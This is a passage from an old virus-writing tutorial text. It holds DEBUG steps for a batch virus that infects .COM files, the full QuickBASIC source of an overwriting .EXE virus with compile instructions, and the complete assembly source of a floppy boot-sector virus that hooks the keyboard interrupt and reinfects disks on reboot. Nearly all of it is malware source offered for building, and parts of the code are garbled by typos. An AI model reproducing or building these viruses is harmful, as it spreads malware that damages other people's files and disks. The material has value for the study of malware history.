e108 ".BAT" (Extention of file name is changed to .BAT)
m100,10b,f010 (File is saved again)
e100"DEL " (DEL command is written to address 100H)
mf000,f00b,104 (Original file is written after this command)
e10c 2e (Period is placed in from of extension)
e110 0d,0a (Carrige return+ line feed)
mf010,f020,11f ( Modified file is moved to 11FH address from buffer area)
e112 "COPY \VR.BAT" ( COPY command is now placed in front of file)
e12b od,0a (COPY command terminated with carriage return + lf)
rxc ( The CX register is ... )
2c ( set to 2CH)
nname.bat ( Name it NAME.BAT)
w ( Write )
q ( quit )
The third command file must be printed as a hex dump because it contains
2 control characters (1Ah=Control Z) and this is not entirely printable.
Hex dump of the third command file:
-----------------------------------
Name: 3
0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
1 , 1 ? . . n y y y y y y y
0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
y . 2 , ? ? r . . n n y y y
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
y y y y . E . . . . . . . . .
In order for this virus to work VR.BAT should be in the root. This program
only affects .COM files.
[2.8]
Viruses in Basic
----------------
Basic is great language and often people think of it as a limited language
and will not be of any use in creating something like a virus. Well you are
really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987.
This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE
files.To do this you must compile the source code using a the Microsoft
Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit
the source code to place the lenght of the object program in the LENGHTVIR
variable. BV3.EXE should be in the current directory, COMMAND.COM must be
available, the LENGHTVIR variable must be set to the lenght of the linked
program and remember to use /e parameter when compiling.
10 REM ** DEMO
20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
30 REM ** BASIC DOESNT SUCK
40 REM ** NO KIDDING
50 ON ERROR GOTO 670
60 REM *** LENGHTVIR MUST BE SET **
70 REM *** TO THE LENGHT TO THE **
80 REM *** LINKED PROGRAM ***
90 LENGHTVIR=2641
100 VIRROOT$="BV3.EXE"
110 REM *** WRITE THE DIRECTORY IN THE FILE "INH"
130 SHELL "DIR *.EXE>INH"
140 REM ** OPEN "INH" FILE AND READ NAMES **
150 OPEN "R",1,"INH",32000
160 GET #1,1
170 LINE INPUT#1,ORIGINAL$
180 LINE INPUT#1,ORIGINAL$
190 LINE INPUT#1,ORIGINAL$
200 LINE INPUT#1,ORIGINAL$
210 ON ERROR GOT 670
220 CLOSE#2
230 F=1:LINE INPUT#1,ORIGINAL$
240 REM ** "%" IS THE MARKER OF THE BV3
250 REM ** "%" IN THE NAME MEANS
260 REM ** INFECTED COPY PRESENT
270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210
280 ORIGINAL$=MID$(ORIGINAL$,1,13)
290 EXTENSIONS$=MID$(ORIGINAL,9,13)
300 MID$(EXTENSIONS$,1,1)="."
310 REM *** CONCATENATE NAMES INTO FILENAMES **
320 F=F+1
330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN
GOTO 350
340 GOTO 320
350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
360 ON ERROR GOTO 210
365 TEST$=""
370 REM ++ OPEN FILE FOUND +++
380 OPEN "R",2,OROGINAL$,LENGHTVIR
390 IF LOF(2) < LENGHTVIR THEN GOTO 420
400 GET #2,2
410 LINE INPUT#1,TEST$
420 CLOSE#2
431 REM ++ CHECK IF PROGRAM IS ILL ++
440 REM ++ "%" AT THE END OF THE FILE MEANS..
450 REM ++ FILE IS ALREADY SICK ++
460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210
470 CLOSE#1
480 ORIGINALS$=ORIGINAL$
490 MID$(ORIGINALS$,1,1)="%"
499 REM ++++ SANE "HEALTHY" PROGRAM ++++
510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$
520 SHELL C$
530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
540 C$="COPY "+VIRROOT$+ORIGINAL$
550 SHELL C$
560 REM *** APPEND VIRUS MARKER ***
570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
580 WRITE#1,ORIGINALS$
590 CLOSE#1
630 REM ++ OUYPUT MESSAGE ++
640 PRINT "INFECTION IN " ;ORIGIANAL$; " !! BE WARE !!"
650 SYSTEM
660 REM ** VIRUS ERROR MESSAGE
670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM
680 END
This basic virus will only attack .EXE files. After the execution you will
see a "INH" file which contains the directory, and the file %SORT.EXE.
Programs which start with "%" are NOT infected ,they pose as back up copies.
;[2.9]
;-----------------------------------------------------------------------;
; This virus is of the "FLOPPY ONLY" variety. ;
; It replicates to the boot sector of a floppy disk and when it gains control
; it will move itself to upper memory. It redirects the keyboard ;
; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ;
; it will attempt to infect any floppy it finds in drive A:. ;
; It keeps the real boot sector at track 39, sector 8, head 0 ;
; It does not map this sector bad in the fat (unlike the Pakistani Brain)
; and should that area be used by a file, the virus ;
; will die. It also contains no anti detection mechanisms as does the ;
; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ;
; sector 9 because this is common to all floppy formats both single ;
; sided and double sided. It does not contain any malevolent TROJAN ;
; HORSE code. It does appear to contain a count of how many times it ;
; has infected other diskettes although this is harmless and the count ;
; is never accessed. ;
; ;
; Things to note about this virus: ;
; It can not only live through an ALT-CTRL-DEL reboot command, but this ;
; is its primary (only for that matter) means of reproduction to other ;
; floppy diskettes. The only way to remove it from an infected system ;
; is to turn the machine off and reboot an uninfected copy of DOS. ;
; It is even resident when no floppy is booted but BASIC is loaded ;
; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ;
; it activates and infectes the floppy from which the user is ;
; attempting to boot. ;
; ;
; Also note that because of the POP CS command to pass control to ;
; its self in upper memory, this virus does not to work on 80286 ;
; machines (because this is not a valid 80286 instruction). ;
; ;
; If your assembler will not allow the POP CS command to execute, replace;
; the POP CS command with an NOP and then assemble it, then debug that ;
; part of the code and place POP CS in place of NOP at that section. ;
; ;
; The Norton Utilities can be used to identify infected diskettes by ;
; looking at the boot sector and the DOS SYS utility can be used to ;
; remove it (unlike the Pakistani Brain). ;
;-----------------------------------------------------------------------;
;
ORG 7C00H ;
;
TOS LABEL WORD ;TOP OF STACK
;-----------------------------------------------------------------------;
; 1. Find top of memory and copy ourself up there. (keeping same offset);
; 2. Save a copy of the first 32 interrupt vectors to top of memory too ;
; 3. Redirect int 9 (keyboard) to ourself in top of memory ;
; 4. Jump to ourself at top of memory ;
; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ;
;-----------------------------------------------------------------------;
BEGIN: CLI ;INITIALIZE STACK
XOR AX,AX ;
MOV SS,AX ;
MOV SP,offset TOS ;
STI ;
;
MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512)
MOV DS,BX ;
MOV AX,[0013H] ;
MUL BX ;
SUB AX,07E0H ; (7C00H+512)/16
MOV ES,AX ;
;
PUSH CS ;DS = CS
POP DS ;
;
CMP DI,3456H ;IF THE VIRUS IS REBOOTING...
JNE B_10 ;
DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1--
;
B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY
MOV DI,SI ;
MOV CX,512 ;
CLD ;
REP MOVSB ;
;
MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO
MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE
MOV CX,128 ;
REP MOVSB ;
;
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
;
PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH
POP CS
;
PUSH DS ;DS=0 ; ES = DS
POP ES ;
;
MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00
MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0
MOV CX,2708H ; TRACK 40, SECTOR 8
MOV AX,0201H ; READ SECTOR
INT 13H ; (common to 8/9 sect. 1/2 sided!)
JB $ ; HANG IF ERROR
;
JMP JMP_BOOT ;JMP 0000:7C00
;
;-----------------------------------------------------------------------;
; SAVE THEN REDIRECT INT 9 VECTOR ;
; ;
; ON ENTRY: DS = 0 ;
; ES = WHERE TO SAVE OLD_09 & (HI) ;
; WHERE NEW_09 IS (HI) ;
;-----------------------------------------------------------------------;
PUT_NEW_09: ;
DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024
;
MOV SI,9*4 ;COPY INT 9 VECTOR TO
MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!)
MOV CX,0004 ;
;
CLI ;
REP MOVSB ;
MOV Word Ptr [9*4],offset NEW_09
MOV [(9*4)+2],ES ;
STI ;
;
RET ;
;
;-----------------------------------------------------------------------;
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ;
;-----------------------------------------------------------------------;
ACK_KEYBD: ;
IN AL,61H ;RESET KEYBOARD THEN CONTINUE
MOV AH,AL ;
OR AL,80H ;
OUT 61H,AL ;
XCHG AL,AH ;
OUT 61H,AL ;
JMP RBOOT ;
;
;-----------------------------------------------------------------------;
; DATA AREA WHICH IS NOT USED IN THIS VERSION ;
; REASON UNKNOWN ;
;-----------------------------------------------------------------------;
TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39
DB 27H,0,2,2 ; (CURRENTLY NOT USED)
DB 27H,0,3,2 ;
DB 27H,0,4,2 ;
DB 27H,0,5,2 ;
DB 27H,0,6,2 ;
DB 27H,0,7,2 ;
DB 27H,0,8,2 ;
;
;A7C9A LABEL BYTE ;
DW 00024H ;NOT USED
DB 0ADH ;
DB 07CH ;
DB 0A3H ;
DW 00026H ;
;
;L7CA1: ;
POP CX ;NOT USED
POP DI ;
POP SI ;
POP ES ;
POP DS ;
POP AX ;
POPF ;
JMP 1111:1111 ;
;
;-----------------------------------------------------------------------;
; IF ALT & CTRL & DEL THEN ... ;
; IF ALT & CTRL & ? THEN ... ;
;-----------------------------------------------------------------------;
NEW_09: PUSHF ;
STI ;
;
PUSH AX ;
PUSH BX ;
PUSH DS ;
;
PUSH CS ;DS=CS
POP DS ;
;
MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME
IN AL,60H ;GET SCAN CODE
MOV AH,AL ;SAVE IN AH
AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
;
CMP AL,1DH ;IS IT A [CTRL]...
JNE N09_10 ;...JUMP IF NO
MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
JMP N09_30 ;
;
N09_10: CMP AL,38H ;IS IT AN [ALT]...
JNE N09_20 ;...JUMP IF NO
MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
JMP N09_30 ;
;
N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)...
JNE N09_30 ;...JUMP IF NO
;
CMP AL,17H ;IF [I]...
JE N09_X0 ;...JUMP IF YES
CMP AL,53H ;IF [DEL]...
JE ACK_KEYBD ;...JUMP IF YES
;
N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME
;
N09_90: POP DS ;
POP BX ;
POP AX ;
POPF ;
;
DB 0EAH ;JMP F000:E987
OLD_09 DW ? ;
DW 0F000H ;
;
N09_X0: JMP N09_X1 ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!?
MOV AX,0800H ;AL=0, AH=DELAY ARG
OUT DX,AL ;
CALL DELAY ;
MOV [ALT_CTRL],AX ;AX=0 ;
;
MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR
INT 10H ;
MOV AH,2 ;SET CURSOR POS 0,0
XOR DX,DX ;
MOV BH,DH ; PAGE 0
INT 10H ;
;
MOV AH,1 ;SET CURSOR TYPE
MOV CX,0607H ;
INT 10H ;
;
MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW)
CALL DELAY ;
;
CLI ;
OUT 20H,AL ;SEND EOI TO INT CONTROLLER
;
MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!)
MOV SI,offset BEGIN - 128 ;
MOV CX,128 ;
CLD ;
REP MOVSB ;
;
MOV DS,CX ;CX=0 ;DS=0
;
MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
MOV [(19H*4)+2],CS ;
;
MOV AX,0040H ;DS = ROM DATA AREA
MOV DS,AX ;
;
MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0
INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)
;
PUSH DS ;IF BIOS F000:E502 == 21E4...
MOV AX,0F000H ;
MOV DS,AX ;
CMP Word Ptr [0E502H],21E4H ;
POP DS ;
JE R_90 ;
INT 19H ; IF NOT...REBOOT
;
R_90: JMP 0F000:0E502H ;...DO IT ?!?!?!
;
;-----------------------------------------------------------------------;
; REBOOT INT VECTOR ;
;-----------------------------------------------------------------------;
NEW_19: XOR AX,AX ;
;
MOV DS,AX ;DS=0
MOV AX,[0410] ;AX=EQUIP FLAG
TEST AL,1 ;IF FLOPPY DRIVES ...
JNZ N19_20 ;...JUMP
N19_10: PUSH CS ;ELSE ES=CS
POP ES ;
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
INT 18H ;LOAD BASIC
;
N19_20: MOV CX,0004 ;RETRY COUNT = 4
;
N19_22: PUSH CX ;
MOV AH,00 ;RESET DISK
INT 13 ;
JB N19_81 ;
MOV AX,0201 ;READ BOOT SECTOR
PUSH DS ;
POP ES ;
MOV BX,offset BEGIN ;
MOV CX,1 ;TRACK 0, SECTOR 1
INT 13H ;
N19_81: POP CX ;
JNB N19_90 ;
LOOP N19_22 ;
JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC
;
;-----------------------------------------------------------------------;
; Reinfection segment. ;
;-----------------------------------------------------------------------;
N19_90: CMP DI,3456 ;IF NOT FLAG SET...
JNZ RE_INFECT ;...RE INFECT
;
JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR
JMP 0000:7C00H ;
;
;-----------------------------------------------------------------------;
; Reinfection Segment. ;
;-----------------------------------------------------------------------;
RE_INFECT: ;
MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH
MOV CX,00E6H ; OURSELF
MOV DI,SI ;
PUSH CS ;
POP ES ;
CLD ;
REPE CMPSB ;
JE RI_12 ;IF NOT EQUAL...
;
INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
;
;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;
MOV BX,offset TABLE ;FORMAT INFO
MOV DX,0000 ;DRIVE A: HEAD 0
MOV CH,40-1 ;TRACK 39
MOV AH,5 ;FORMAT
JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW !
;
; <<< NO EXECUTION PATH TO HERE >>> ;
JB RI_80 ;
;
;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0
MOV BX,offset BEGIN ;TRACK 40H
MOV CL,8 ;SECTOR 8
MOV AX,0301H ;WRITE 1 SECTOR
INT 13H ;
;
PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW)
POP ES ;
JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE
;
MOV CX,0001 ;WRITE INFECTED BOOT SECTOR !
MOV AX,0301 ;
INT 13H ;
JB RI_80 ; IF ERROR...JUMP TO BOOT CODE
;
RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"...
INT 19H ;...FLAG AND REBOOT
;
RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT)
JMP JMP_BOOT ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS
;
MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG
MOV BX,0040H ;
MOV DS,BX ;
MOV [0072H],AX ; 0040:0072 = RESET FLAG
JMP N09_90 ;
;
;-----------------------------------------------------------------------;
; DELAY ;
; ;
; ON ENTRY AH:CX = LOOP COUNT ;
;-----------------------------------------------------------------------;
DELAY: SUB CX,CX ;
D_01: LOOP $ ;
SUB AH,1 ;
JNZ D_01 ;
RET ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
A7DF4 DB 27H,00H,8,2
COUNTER_1 DW 001CH
ALT_CTRL DW 0
A7DFC DB 27H,0,8,2
|
|
